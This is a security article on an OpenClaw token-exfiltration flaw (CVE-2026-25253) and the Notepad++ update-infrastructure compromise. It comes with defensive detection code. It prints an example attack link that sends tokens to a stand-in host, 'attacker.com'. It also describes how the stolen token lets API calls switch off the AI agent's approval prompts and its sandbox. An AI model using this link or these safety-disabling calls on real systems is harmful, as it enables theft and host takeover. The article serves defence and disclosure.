
OpenClaw RCE and Notepad++ Supply Chain Attack: 2026 Threats
State-sponsored hackers maintained six-month access to Notepad++ update infrastructure while a critical one-click vulnerability in OpenClaw enabled complete gateway compromise through malicious links. These aren't isolated incidents—they represent a fundamental shift in how adversaries exploit trusted development tools that security professionals depend on daily.
CVE-2026-25253 affects OpenClaw (formerly Clawdbot and Moltbot), enabling attackers to exfiltrate authentication tokens through WebSocket origin validation failures and achieve remote code execution with CVSS score 8.8. Meanwhile, Chinese APT group Lotus Blossom compromised Notepad++ hosting infrastructure from June through December 2025, selectively targeting telecommunications and financial organizations in East Asia. Both attacks exploited infrastructure-level weaknesses rather than application code vulnerabilities.
This analysis examines verified technical details from primary sources including CVE databases, vendor advisories, and incident response reports. You'll understand how these attacks bypass traditional security controls and what immediate actions protect development environments.
The OpenClaw Token Exfiltration Vulnerability
WebSocket Origin Validation Failure
OpenClaw's Control UI accepts gatewayUrl parameters from query strings without validation, automatically initiating WebSocket connections that transmit stored gateway tokens. Security researcher Mav Levin from depthfirst discovered this logic flaw enables cross-site WebSocket hijacking (CSWSH) because the server fails to validate the Origin header in requests.
The attack chain executes in milliseconds. A victim clicking a crafted link like https://victim-ui/?gatewayUrl=wss://attacker.com/exfil triggers automatic token transmission to attacker-controlled servers. The stolen Bearer token grants operator-level access to the victim's local gateway API, enabling arbitrary configuration changes and privileged command execution.
Important: Even localhost-only OpenClaw instances remain vulnerable. The attack uses the victim's browser as a pivot point into the local network, bypassing the need for internet-facing exposure entirely.
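Both gaps described above come down to comparing a URL against an exact allowlist before any token is sent or any handshake is accepted. This added example (not OpenClaw's code, and not its actual patch) shows one way to make that check for the gatewayUrl parameter and for the handshake Origin header; the allowlisted hosts and ports are constructed.

```python
from urllib.parse import urlsplit

DEFAULT_PORTS = {"ws": 80, "wss": 443, "http": 80, "https": 443}

# Hypothetical allowlists; every host and port here is constructed for the example.
ALLOWED_GATEWAYS = {("ws", "127.0.0.1", 9000), ("wss", "gateway.corp.example", 443)}
ALLOWED_ORIGINS = {("http", "127.0.0.1", 9000), ("https", "ui.corp.example", 443)}


def _endpoint(url, schemes):
    """Reduce a URL to (scheme, host, port); None for anything malformed or ambiguous."""
    try:
        parts = urlsplit(url)
        port = parts.port  # raises ValueError on a non-numeric or out-of-range port
    except ValueError:
        return None
    scheme = parts.scheme.lower()
    if scheme not in schemes or not parts.hostname:
        return None
    if parts.username is not None or parts.password is not None:
        return None  # userinfo makes "wss://trusted@other-host/" look trusted at a glance
    host = parts.hostname.lower().rstrip(".")
    return (scheme, host, port if port is not None else DEFAULT_PORTS[scheme])


def gateway_url_allowed(gateway_url):
    """Client side: only connect (and send the token) to an exact allowlisted gateway."""
    return _endpoint(gateway_url, {"ws", "wss"}) in ALLOWED_GATEWAYS


def origin_allowed(origin_header):
    """Server side: accept a WebSocket handshake only from an allowlisted page origin."""
    if not origin_header or origin_header == "null":
        return False  # missing or opaque origin: refuse rather than guess
    return _endpoint(origin_header, {"http", "https"}) in ALLOWED_ORIGINS


if __name__ == "__main__":
    for url in ("ws://127.0.0.1:9000/", "wss://attacker.com/exfil",
                "wss://gateway.corp.example@attacker.com/"):
        print(url, "->", gateway_url_allowed(url))
    for origin in ("https://ui.corp.example", "https://other.example", None):
        print(origin, "->", origin_allowed(origin))
```

An Origin check only constrains browsers, so it complements token authentication rather than replacing it.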
Sandbox Escape Through API Manipulation
OpenClaw implements robust safety features including execution approval prompts and containerized sandboxes for dangerous operations. However, the stolen authentication token includes operator.admin and operator.approvals scopes, allowing attackers to disable these protections through API calls rather than exploiting sandbox implementation vulnerabilities.
Attackers send exec.approvals.set requests setting ask: "off" to eliminate user confirmation requirements. A subsequent config.patch request changes tools.exec.host to "gateway", forcing commands to execute directly on the host machine instead of inside Docker containers. This API-based bypass demonstrates how authentication compromise can render technical security controls irrelevant.
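The two safety-disabling calls described above leave a recognizable trace in a gateway audit trail. This added example (not code from OpenClaw or from the original article) scans constructed JSON-lines audit records for them; the record layout and the ts, token_id and params field names are assumptions, while the method names and values come from the text.

```python
import json
from datetime import datetime, timedelta

# Constructed audit records. The JSON-lines layout and the ts/token_id/params field
# names are assumptions for this example, not OpenClaw's actual log format.
SAMPLE_LOG = """\
{"ts": "2026-01-20T10:00:05Z", "token_id": "tok-a", "method": "exec.approvals.set", "params": {"ask": "off"}}
{"ts": "2026-01-20T10:00:06Z", "token_id": "tok-a", "method": "config.patch", "params": {"tools": {"exec": {"host": "gateway"}}}}
{"ts": "2026-01-20T10:30:00Z", "token_id": "tok-b", "method": "config.patch", "params": {"tools.exec.host": "placeholder-sandbox"}}
not-json debris line
{"ts": "2026-01-20T11:00:00Z", "token_id": "tok-c", "method": "exec.approvals.set", "params": {"ask": "off"}}
"""
OTHER = {"approvals_disabled": "sandbox_bypassed", "sandbox_bypassed": "approvals_disabled"}


def lookup(params, dotted):
    """Read a setting given as a flat dotted key or as nested objects."""
    if isinstance(params, dict) and dotted in params:
        return params[dotted]
    for part in dotted.split("."):
        params = params.get(part) if isinstance(params, dict) else None
    return params


def classify(rec):
    """Name the safety control a call weakens, or return None."""
    method, params = rec.get("method"), rec.get("params") or {}
    if method == "exec.approvals.set" and lookup(params, "ask") == "off":
        return "approvals_disabled"
    if method == "config.patch" and lookup(params, "tools.exec.host") == "gateway":
        return "sandbox_bypassed"
    return None


def find_safety_downgrades(log_text, window=timedelta(minutes=5)):
    """Flag weakening calls; 'critical' once one token has made both within window."""
    findings, last_seen = [], {}  # last_seen: (token_id, kind) -> timestamp
    for line in log_text.splitlines():
        try:
            rec = json.loads(line)
            ts = datetime.fromisoformat(rec["ts"].replace("Z", "+00:00"))
        except (ValueError, KeyError, TypeError, AttributeError):
            continue  # skip lines that are not usable audit records
        kind = classify(rec)
        if kind is None:
            continue
        token = rec.get("token_id", "unknown")
        prev = last_seen.get((token, OTHER[kind]))
        sev = "critical" if prev is not None and abs(ts - prev) <= window else "high"
        findings.append({"ts": rec["ts"], "token_id": token, "kind": kind, "severity": sev})
        last_seen[(token, kind)] = ts
    return findings
```

Calling find_safety_downgrades(SAMPLE_LOG) returns one finding per weakening call, with the second tok-a call rated critical because it completes the pair.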
Attack Progression Analysis
| Stage | Technical Action | Attacker Capability | Detection Opportunity |
|---|---|---|---|
| Delivery | Victim clicks malicious link | Token exfiltration initiated | Email/web gateway inspection |
| Capture | WebSocket connection to attacker server | Authentication token stolen | Network traffic monitoring |
| Hijack | Legitimate API connection established | Full gateway API access gained | Anomalous WebSocket origins |
| Disable | Safety features removed via API | Sandbox escape, approval bypass | API call pattern analysis |
| Execute | Arbitrary shell command invocation | Complete host system control | Process behavior monitoring |
Impact Across User Profiles
Users granting OpenClaw "god mode" permissions face catastrophic impact. The AI agent holds keys to email, messaging platforms, and unrestricted local computer control. Over 100,000 developers trust OpenClaw with authentication to sensitive services including iMessage, WhatsApp, Slack, and development infrastructure.
Security researcher Peter Steinberger noted the vulnerability affects any deployment where users authenticated to the Control UI. Attackers inherit all permissions granted to the AI agent, including access to API keys, authentication tokens, source code repositories, and cloud infrastructure credentials stored in development environments.
The Notepad++ Infrastructure Compromise
Six-Month Persistence Through Hosting Provider
Chinese state-sponsored threat actors attributed to Lotus Blossom (also tracked as Raspberry Typhoon, Bilbug, Spring Dragon) compromised the shared hosting server for notepad-plus-plus.org beginning June 2025. The attack evolved through three distinct phases as defenders closed initial access vectors.
Phase one exploited an unpatched kernel vulnerability granting root access until September 2, 2025. After kernel patching eliminated server access, attackers maintained stolen credentials for internal services until December 2, 2025. This allowed continued redirection of Notepad++ update traffic to attacker-controlled servers serving malicious manifests.
The hosting provider confirmed attackers specifically searched for the notepad-plus-plus.org domain, suggesting prior knowledge of insufficient update verification controls in older Notepad++ versions. Traffic from targeted users was selectively redirected rather than broadly compromised, making detection significantly more difficult.
Selective Targeting and Custom Backdoors
Rapid7 researchers discovered the campaign deployed Chrysalis, a previously undocumented custom backdoor. Kaspersky identified three different infection chains rotating C2 servers, downloaders, and payloads monthly from July through October 2025. Approximately twelve machines were targeted across specific geographic and organizational profiles.
Confirmed victims included individuals in Vietnam, El Salvador, and Australia, plus organizations in the Philippines (government), El Salvador (financial services), and Vietnam (IT service provider). The targeting pattern focused on telecommunications and financial organizations with interests in East Asia.
Infection Chain Evolution
| Period | C2 Infrastructure | Delivery Mechanism | Target Profile | Payload Type |
|---|---|---|---|---|
| July 2025 | 45.76.155[.]202 | NSIS installer | Taiwan organizations | System reconnaissance |
| Aug-Sep 2025 | Rotating IPs | Custom downloaders | Vietnam IT providers | Chrysalis backdoor |
| Oct 2025 | temp[.]sh uploads | Shell command chains | Financial services | Data exfiltration |
| Nov-Dec 2025 | Maintained credentials | Traffic redirection | Selective targeting | Access preservation |
Supply Chain Attack Methodology
Rather than compromising Notepad++ source code, attackers intercepted update traffic at the infrastructure layer. The legitimate updater (WinGUp) checked for updates at notepad-plus-plus.org/getDownloadUrl.php, which attackers redirected to malicious servers returning tampered update manifests pointing to attacker-controlled executables.
Security researcher Kevin Beaumont noted this attack pattern requires significant resources. Sitting inside the ISP chain to redirect traffic at scale indicates nation-state capabilities. The selective targeting—affecting only specific organizations rather than all Notepad++ users—demonstrates sophisticated operational security prioritizing intelligence collection over broad compromise detection.
Pro Tip: Analyze update traffic patterns in network logs. Legitimate Notepad++ updates come from verified domains with valid code signatures. Any redirects to unexpected IPs or domains downloading executables warrant immediate investigation.
Detection and Remediation Strategies
Immediate OpenClaw Mitigation
Update all OpenClaw instances to version 2026.1.29 or later, released January 30, 2026. The patch adds gateway URL confirmation modals, eliminating the auto-connect behavior that enabled token exfiltration. All versions through 2026.1.24-1 contain the vulnerability and require immediate replacement.
Rotate all gateway authentication tokens after updating. Assume any tokens used while running vulnerable versions may have been exfiltrated. Generate new authToken values for every OpenClaw instance and revoke previously issued tokens.
Run OpenClaw with minimal permissions rather than "god mode" configurations. Limit agent access to specific tools and services required for intended functionality. Avoid granting unrestricted shell access, file system permissions, or cloud infrastructure API keys unless absolutely necessary for specific workflows.
Notepad++ Verification and Hardening
Download Notepad++ version 8.9.1 or later directly from the official website and install manually. This version includes WinGUp security enhancements verifying installer certificates and signatures. Version 8.9.2, expected in approximately one month, will enforce mandatory certificate signature verification.
Verify existing Notepad++ installations by comparing file hashes against official sources. Review process histories for suspicious executions of notepad++.exe spawning GUP.exe followed by unexpected update.exe or other unusual processes. Check for outbound connections to IPs outside normal update infrastructure.
Enterprise environments should consider blocking notepad-plus-plus.org at network boundaries or preventing gup.exe from internet access if centralized package management handles updates. Deploy robust monitoring for Notepad++ extension installations and unusual process behavior including shell command execution or external network connections.
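The process-history review described above can be automated over process-creation telemetry. This added example (not from Rapid7, Kaspersky or the Notepad++ project) walks constructed events shaped loosely like Sysmon Event ID 1 and reports unexpected children of the notepad++.exe → GUP.exe chain along with their descendants; the expected-installer name pattern is an assumption.

```python
import re
from ntpath import basename  # parses Windows paths on any OS

# Constructed process-creation events in time order. The pid/ppid/image fields loosely
# mirror Sysmon Event ID 1; every path and PID is made up for this example.
EVENTS = [
    {"pid": 100, "ppid": 1, "image": r"C:\Windows\explorer.exe"},
    {"pid": 200, "ppid": 100, "image": r"C:\Program Files\Notepad++\notepad++.exe"},
    {"pid": 210, "ppid": 200, "image": r"C:\Program Files\Notepad++\updater\GUP.exe"},
    {"pid": 220, "ppid": 210, "image": r"C:\Users\a\AppData\Local\Temp\npp.8.9.1.Installer.x64.exe"},
    {"pid": 300, "ppid": 100, "image": r"C:\Program Files\Notepad++\notepad++.exe"},
    {"pid": 310, "ppid": 300, "image": r"C:\Program Files\Notepad++\updater\gup.exe"},
    {"pid": 320, "ppid": 310, "image": r"C:\Users\b\AppData\Local\Temp\update.exe"},
    {"pid": 330, "ppid": 320, "image": r"C:\Windows\System32\cmd.exe"},
    {"pid": 400, "ppid": 100, "image": r"C:\Tools\update.exe"},
]

# Assumption: the only child GUP.exe should start is a Notepad++ installer named like
# npp.<version>.Installer[.<arch>].exe. Tune this to what your fleet really runs.
EXPECTED_CHILD = re.compile(r"^npp\.[\d.]+\.installer(\.\w+)?\.exe$", re.IGNORECASE)


def image_name(event):
    return basename(event["image"]).lower()


def find_suspicious_update_chains(events):
    """Flag unexpected children of notepad++.exe -> GUP.exe, plus their descendants."""
    live, flagged, findings = {}, {}, []  # pid -> event, pid -> chain
    for ev in events:
        parent = live.get(ev["ppid"])
        grand = live.get(parent["ppid"]) if parent else None
        chain = None
        if ev["ppid"] in flagged:
            chain = flagged[ev["ppid"]] + [image_name(ev)]
        elif (parent and grand and image_name(parent) == "gup.exe"
              and image_name(grand) == "notepad++.exe"
              and not EXPECTED_CHILD.match(image_name(ev))):
            chain = [image_name(grand), image_name(parent), image_name(ev)]
        live[ev["pid"]] = ev          # later events resolve this PID to the new process
        flagged.pop(ev["pid"], None)  # a reused PID does not inherit an old verdict
        if chain:
            flagged[ev["pid"]] = chain
            findings.append({"pid": ev["pid"], "chain": " -> ".join(chain)})
    return findings


if __name__ == "__main__":
    for finding in find_suspicious_update_chains(EVENTS):
        print(finding)
```

Name matching is only a triage filter, since a file name is trivial to imitate; pair it with a signature check on the child image before clearing an event.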
Detection Indicators Comparison
| Threat | Network Indicators | Process Indicators | File System Indicators | Timeline |
|---|---|---|---|---|
| OpenClaw CVE-2026-25253 | WebSocket to unexpected origins, bearer tokens in transit | Config mutations, sandbox disables, unusual API calls | Gateway config changes | Milliseconds |
| Notepad++ Supply Chain | Redirects to non-standard update servers, temp[.]sh uploads | notepad++.exe → GUP.exe → update.exe chain | Unsigned or newly-signed executables | Hours to days |
Infrastructure Security Fundamentals
Both attacks succeeded through infrastructure-level compromise rather than application code vulnerabilities. The OpenClaw flaw existed in the Control UI's request handling logic. The Notepad++ breach occurred at the hosting provider level through shared server vulnerabilities and credential theft.
Implement defense-in-depth strategies assuming any single layer may fail. Code signing alone didn't prevent the Notepad++ attack because manifest manipulation occurred before signature validation. Network security controls complement application-level protections when perimeter defenses are bypassed.
Monitor authentication token usage patterns for anomalies. Multiple sessions from single credentials within short timeframes indicate potential exfiltration and unauthorized reuse. Implement token rotation policies limiting credential lifespan and enforcing periodic regeneration regardless of suspected compromise.
Broader Supply Chain Security Implications
Shared Hosting as Single Point of Failure
The Notepad++ incident validates concerns about shared hosting infrastructure for critical software distribution. One compromised server affected update integrity for millions of global users. Organizations distributing software through shared hosting require additional validation layers beyond standard code signing.
Notepad++ migrated to a new hosting provider with significantly stronger security practices following the incident. However, the six-month compromise period demonstrates detection challenges when attackers maintain operational security discipline. No indicators of compromise were found in 400GB of server logs analyzed during incident response.
Deploy independent verification mechanisms for all software updates. Hash checking against multiple independent sources catches manifest manipulation. Monitor update traffic for redirects to unexpected domains or IP addresses. Consider dedicated infrastructure for security-critical application distribution eliminating shared hosting risks.
The Evolution of Nation-State Tactics
Lotus Blossom's Notepad++ campaign demonstrates sophisticated persistence tactics characteristic of state-sponsored operations. Rather than smash-and-grab data theft, the six-month operation maintained long-term access through infrastructure compromise, credential persistence, and selective targeting avoiding widespread detection.
Monthly rotation of C2 servers, downloaders, and payloads shows adaptive adversary behavior responding to defensive measures. The deployment of custom backdoors like Chrysalis indicates significant development resources dedicated to this specific campaign.
How should organizations defend against adversaries willing to invest six months maintaining selective access to trusted software distribution channels? Traditional annual penetration testing misses persistent access established months earlier. Continuous validation of trust relationships, code integrity, and infrastructure security becomes essential.
Key Takeaways
- Update OpenClaw to version 2026.1.29 immediately and rotate all authentication tokens to remediate CVE-2026-25253 enabling one-click remote code execution through WebSocket hijacking
- Download Notepad++ version 8.9.1 or later manually from official sources and verify installation integrity through hash comparison against multiple independent sources
- Implement network monitoring detecting WebSocket connections to unexpected origins and software update traffic redirects indicating infrastructure-level compromise attempts
- Run AI agents and development tools with minimal permissions rather than unrestricted access, limiting blast radius when authentication tokens are exfiltrated
- Migrate critical software distribution away from shared hosting infrastructure and deploy independent verification mechanisms beyond code signing alone
- Establish continuous validation frameworks replacing annual assessments, as sophisticated adversaries maintain six-month persistence through infrastructure compromise and credential theft
Conclusion
The OpenClaw vulnerability and Notepad++ supply chain attack demonstrate how adversaries increasingly target development tool infrastructure and authentication mechanisms. CVE-2026-25253's one-click exploitation through token exfiltration and Lotus Blossom's six-month persistence through hosting provider compromise reveal security gaps in software that developers rely on daily.
Patch known vulnerabilities immediately. Update OpenClaw and Notepad++ installations before attackers exploit remaining exposure windows. Implement verification layers catching infrastructure manipulation that code signing alone misses. Deploy monitoring detecting behavioral indicators when technical controls fail.
The attacks succeeded because traditional security models assume code vulnerabilities represent primary risk. Modern threats target infrastructure hosting software distribution, authentication token theft, and selective traffic interception. Organizations must implement defense-in-depth strategies assuming compromise and limiting blast radius when initial defenses fail. Start with immediate patching protecting against verified threats, then build frameworks preventing next-generation attack vectors.
Frequently Asked Questions
Q: How do I verify my OpenClaw installation isn't compromised by CVE-2026-25253?
A: Check your version through the admin console: any version before 2026.1.29, released January 30, 2026, contains the WebSocket origin validation vulnerability. After updating, review gateway logs for unusual WebSocket connections from unexpected origins and regenerate all authentication tokens. Analyze API call patterns for suspicious configuration changes disabling sandbox or approval settings.
Q: Can traditional antivirus detect the Notepad++ supply chain attack payloads?
A: Signature-based antivirus likely misses the Chrysalis backdoor since it's previously undocumented custom malware delivered through legitimate update mechanisms with valid initial code signatures. Behavioral detection and endpoint detection and response (EDR) solutions offer better protection by identifying suspicious post-installation activities like unusual process chains (notepad++.exe → GUP.exe → update.exe) and unexpected network connections. Verify installations by comparing file hashes against official Notepad++ sources.
Q: Why does the OpenClaw vulnerability affect localhost-only installations?
A: The attack uses the victim's browser as a pivot point into the local network through cross-site WebSocket hijacking. When the victim clicks a malicious link, their browser initiates the outbound WebSocket connection to the attacker's server, exfiltrating the authentication token. The attacker then uses that stolen token to connect to the victim's localhost OpenClaw instance directly, bypassing the need for the instance itself to be internet-facing.
Q: What makes the Notepad++ attack attribution to Lotus Blossom credible?
A: Multiple independent security researchers including Rapid7 and Kaspersky identified tactics, techniques, and procedures matching Lotus Blossom's historical operations. The deployment of custom backdoors like Chrysalis, selective targeting of telecommunications and financial organizations in East Asia, six-month persistence through infrastructure compromise, and monthly rotation of attack infrastructure all align with known Chinese state-sponsored APT patterns. The hosting provider confirmed attackers specifically searched for the notepad-plus-plus.org domain, suggesting prior intelligence gathering.
Q: Should development teams stop using AI agents like OpenClaw after this vulnerability?
A: The vulnerability has been patched in version 2026.1.29, and OpenClaw remains viable for teams implementing proper security controls. Run agents with minimal necessary permissions rather than "god mode" unrestricted access, deploy network monitoring for unusual WebSocket traffic, implement token rotation policies, and educate users about clicking suspicious links in development contexts. The security lesson isn't abandoning useful tools but implementing defense-in-depth strategies assuming any individual control may fail.
